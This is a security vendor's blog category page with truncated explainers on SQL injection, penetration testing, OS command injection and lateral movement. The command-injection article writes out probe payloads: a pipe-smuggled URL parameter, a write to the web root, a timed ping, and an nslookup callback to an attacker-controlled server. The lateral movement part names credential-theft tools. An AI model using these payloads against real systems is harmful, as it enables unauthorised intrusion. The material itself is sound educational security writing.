Category: Cyber Security

What is SQL Injection? SQLi Explained An overview of what SQL Injection is, understand the attack, and the potential risk to your organisation. What is SQL Injection? SQL injection is a web application vulnerability that allows an attacker to insert SQL syntax as user supplied input into a web application, resulting in the supplied input being processed as SQL commands by the backend SQL database. Successful exploitation of a SQL vulnerability, could allow an attacker to modify SQL statements. How Does SQL Injection Work? SQL Injection (SQLi) occurs when an application does not have the correct controls in place to prevent an attacker from inserting (injecting) parts of their own SQL statement, an action which typically causes an error, or other unintended behaviour. This indicates to the attacker that they may have been able to manipulate the backend SQL database. After the initial proof of concept, the attacker would typically begin to craft more advanced SQL statements to exploit the vulnerability. Concerned about SQL Injection? Have your web application assessed for SQL Injection using our website security audit assessment service. Risks: Why is the SQL injection Attacks Dangerous? Successful exploitation of a SQL injection vulnerability could lead to complete exfiltration of user date (database dumping), full server compromise and/or a foothold for an attacker to gain access into the network and perform a lateral movement (advance through the network). Different Types of SQL Injection Attacks: The same concept applies to all SQL injection attacks, but the method of confirming the vulnerability differs depending on the environment, below are the common SQLi attacks found in modern web applications: Blind SQLi Attack Error Based SQLi Attack Time Based SQLi Attack UNION Select SQLi Attack Out-of-Band (OOB) SQLi Attack Learn More: What is OS Command Injection? What is Error Based SQL Injection? Error Based SQL Injection occurs when an attacker provides SQL special characters as input to a web application. The characters are entered in an attempt to break the SQL statement, if successful this action could, potentially cause the application to reflect an error within the response. Learn More: What is VAPT? What is Blind SQL Injection? Blind SQL Injection occurs when injected input is processed by the backend database to perform an action that has no initial output (such as an error message) via the web front end. If the action is successfully completed, this indicates to the attacker that they are able to enter input into the web application and the backend database is processing the input as SQL commands, confirming the target web application is vulnerable to SQL injection. Examples of Blind SQL Injection: Modifying or adding user data (such as adding a user or changing a users password) Performing time-based SQL injection Performing OOB SQL Injection Learn More: What is Pentesting? What is Time Based SQL Injection? Time based SQL injection is similar to blind SQL injection, a timed based SQL payload is used to verify the existence of the vulnerability. The attacker would enter a payload the […]

What is Pentesting? What is a Pentest, and how can it be used to help improve the security posture of your organisation. What is a Pentest? Penetration testing, also known as pen testing, is an authorised attack simulation against an organisations network or applications identifying vulnerabilities and security issues. Vulnerabilities discovered when conducting a penetration testing service are exploited confirming the severity of the issue and compromised machines. Machines or applications compromised during the engagement are used to gain access into an organisations network, this process is carried out to help identify the level of access potential attacker could obtain. Pentest Process Overview: Authorised attack simulation Identifies vulnerabilities Identified vulnerabilities are exploited Privilege escalation is performed Discovered vulnerabilities are used together to gain a higher level of access Penetrated machines are used to access the network Pentesting is typically performed against a companies servers, web applications, external network infrastructure and mobile applications. The assessment process is manual with the use of industry standard commercial and open source tools to assist the testing process. Once a vulnerability has been successfully exploited, a tester may use the machine as an entry point to access other machines within the network, gaining access to data that would normally be protected by firewalls or requiring higher privilege level accounts. Penetration testing helps identify the potential risk factor by identifying the level of data a potential attacker could access. Pentesting is typically broken down into the following actions: Scoping Reconnaissance Discovery Exploitation Control Advancement Reporting What is Manual Pentesting? Manual pen testing leverages the best in class security auditing software and tools and uses human expertise to combine the best of both options and rule out any false positives in the final report. Automated software solutions are unable to identify specific logic flaws and manual Pentesting is required to identify issues based on technical experience. The process of combining both testing solutions is commonly referred to as Vulnerability Assessment and Penetration Testing (VAPT), see our what is VAPT resource for more information. Aptive provide a consultant lead manual web app security audit service to help identify logic flaws and complex application security issues. Pentest FAQ How Much Does a Pentest Cost? This depends on the size and complexity of what requires assessment, contact us for an estimate or read more on our penetration testing services page. Pentest vs Vulnerability Assessment? A pentest is performed manually by a security professional, a vulnerability assessment is an automated assessment conducted by software. What is the Purpose of Pentesting? A Pentest, assess the security of IT infrastructure, API’s or web / mobile applications by attempting to exploit discovered vulnerabilities in a controlled way. These vulnerabilities are then documented, allowing an organisation to see an overview of the discovered issues and their associated risks, perform remediation of the issues, and then have the discovered issues reassessed to verify the remediation efforts were successful. Learn about more about pentesting in our Cyber Security Academy.

What is Penetration Testing? (Pen Testing) A penetration test uses ethical hackers to complete a planned attacks against a company’s infrastructure to identify security vulnerabilities that require fix work, such as patching. Pen testing is a crucial component within a comprehensive web application security approach. What is a Pentest? Penetration testing, or pen testing, involves authorised simulations of attacks on an organisation’s network or applications to pinpoint vulnerabilities and security concerns. The discovered vulnerabilities are exploited to confirm their severity and compromise machines. Machines or applications compromised in the process are utilized to access an organisation’s network, aiding in the assessment of potential attacker access levels. Penetration Testing Overview: How The Process Works It is important to note that penetration tests should be conducted by skilled and ethical professionals, and organisations should be aware of and approve the testing activities to prevent unnecessary disruptions. The goal is to provide valuable insights into security weaknesses and help organisations enhance their overall cybersecurity posture. Who Performs Penetration Testing There are various types of penetration tests, each focusing on specific aspects of a system’s security. Some common types include: Black Box Testing: Testers have little or no prior knowledge of the system, simulating an external hacker’s perspective. White Box Testing: Testers have full knowledge of the system, including source code and architecture, simulating an insider’s perspective. Grey Box Testing: Testers have partial knowledge of the system, combining elements of both black and white box testing. External Testing: Assessing the security of externally-facing systems, such as websites and servers. Internal Testing: Simulating an attack from within the organization to identify vulnerabilities that could be exploited by insiders. Web App Security Testing: Focusing specifically on the security of web applications to uncover vulnerabilities like SQL injection or cross-site scripting. Network Penetration Testing: Evaluating the security of network infrastructure, identifying weaknesses in routers, switches, and other network devices. Social Engineering Testing: Assessing human behavior and susceptibility to manipulation, often involving tactics like phishing. Mobile App Security Testing: Evaluating the security of mobile apps to identify vulnerabilities and potential exploits. The choice of which type of penetration test to perform depends on the specific goals and requirements of the organisation. The ultimate goal of a penetration test is to empower the organisation with insights that help enhance its cybersecurity defences, mitigate risks, and prevent potential security incidents. What Happens After a Penetration Test: Penetration testing is a vital element in bolstering an organisation’s cybersecurity defences. To employ it effectively, the initial step involves defining clear objectives. This entails outlining specific goals and objectives for the penetration test, providing a comprehensive understanding of the aspects within the organisation’s security framework that require assessment. Once these objectives are established, the next crucial step is to clearly define the scope of the penetration test. This involves specifying the systems, networks, and applications that will undergo testing, facilitating a focused and resource-optimised assessment. It’s important to tailor the penetration testing approach to the specific needs and environment of the organisation. A […]

What is OS Command Injection? An overview of what OS Command Injection is, how to detect, exploit and help prevent the web vulnerability. What is OS Command Injection? OS Command Injection occurs when input is passed from an application to the backend operating system (OS), the supplied input is then executed by the operating system as a OS command. The vulnerability is caused by the application lacking the correct controls, such as input validation or sanitisation to prevent dangerous input being accepted and rendered by the web application as an operating system command. The Impact of OS Command Injection If successfully exploited OS Command Injection could allow an attacker or malicious user command execution on the target with the same permissions as the exploited web server. Depending on the configuration of the target, and level of security hardening that has been conducted (or lack there of) successful exploitation of this vulnerability could, potentially result in the attacker gaining complete control of the vulnerable system, exfiltrating sensitive data or performing privilege escalation / lateral movement. Are you concerned about OS Command Injection? Aptive can perform a web app security test to help identify this and other injection attacks. How to Identify OS Command Injection A vulnerable input parameter is the typical entry point for command injection, however other entry points such as HTTP headers, have also been found to be vulnerable. A typical command injection example: https://www.example.com/function.php=blah|test123 If vulnerable, and the application permitted the error to be returned in the response, a “command not found error” would be reflected. The Different Types of OS Command Injection Similar to SQL Injection there are different types or command injection vulnerabilties: What is Error Based Command Injection The injected command induces an error message which is returned in the response by the web application (reflected). What is Blind Command Injection The target application is vulnerable to command injection, however no error is rendered by the application in this case the attacker would perform a proof of concept using either time based, out-of-band or by redirecting output to a file location they could read such a web root. A typical example of this would be echo test123 > /var/www/html/test.txt the attacker would then browse to the web root to verify the command output within the test.txt time. What is Time Based Command Injection The injected command uses a timed based payload, such as ping -c 10 127.0.0.1 the response from the web server is then timed to see if it roughly matches the injected payload delay time. What is Out-of-Band (OOB) Command Injection The injected OS command uses an Out-of-Band method of communication to perform a proof of concept, verifying that the injected OS command has been executed by the target operation system, as a command. For example a DNS lookup or a HTTP request to an attacker controlled server using nslookup nslookup+attacker-server . Learn more: Learn more about what pentesting is and how it can help your organisation identify security issues. How to Prevent […]

Lateral Movement Explained An overview of Lateral Movement and how it is used by Cyber Attackers and threat actors during a penetration test or redteam engagement. What is Lateral Movement? Lateral movement is the technique that a cyber attacker or threat actor uses after gaining a foot hold to traverse through the rest of the network. An attacker typically performs lateral movement to obtain valuable secrets or other sensitive data that will allow access to more endpoints or allow for privilege escalation. Aptive use lateral movement to simulate the role of a real cyber attacker to help demonstrate the risk of an external breach to an organisation, allowing them to learn how for a malicious user could travel though the network and the sensitive information they could gain access to. Real World Example of Lateral Movement: Cryptocurrency Mining Recently lateral movement has been leveraged by attackers and automated tools to compromise as many hosts as possible to mine cryptocurrency on the compromised hosts. How do Attackers Gain a Access to the Network? Some of the most common entry points are unpatched systems, poorly hardened systems, vulnerable web applications, phishing and malware infection. For an in-depth answer specifically for your organisation consider requesting a quote for our penetration testing service. Lateral Movement Process Lateral movement requires the attacker to leverage a way to move through the target network, therefore privilege escalation may or not be required on the entry point machine depending on what level account was originally compromised and if the host has undergone a build hardening review previously. Environment Mapping (Recon) The attacker learns the network, understanding the network subnet structure, username and naming conventions and what threat detection systems are in place such as anti-virus. The enumeration at this point allows the attacker to make informed decisions to pivot through the network, while trying to evade detection. Lateral Movement Techniques For an attacker to move through the network they need to either exploit a service such as SSH, RDP, or obtain valid credentials via social engineering or cracking the hash or dumped credentials. Below are a number of techniques an attacker could leverage to move through the network: Local Enumeration – Identify stored password in history files or locally stored text files. SSH Keys – Locally stored SSH keys are an easy way for an attacker to perform lateral movement via SSH. SSH Hijacking – Various techniques exist that allow an attacker to hijack a SSH session and gain access to downstream servers. Responder – A tool which performs LLMNR spoofing, a service which listens for non resolved Netbios names (or other services) and pretends to be that service, the user then sends their password hash which could be cracked offline using tools like Hashcat. Mimikatz – A tool which extracts plaintext passwords from memory. Pass the Hash – A technique where a captured password hash can be directly passed the service for authentication, remove the requirement to crack the hash to identify the password. Keyloggers – A […]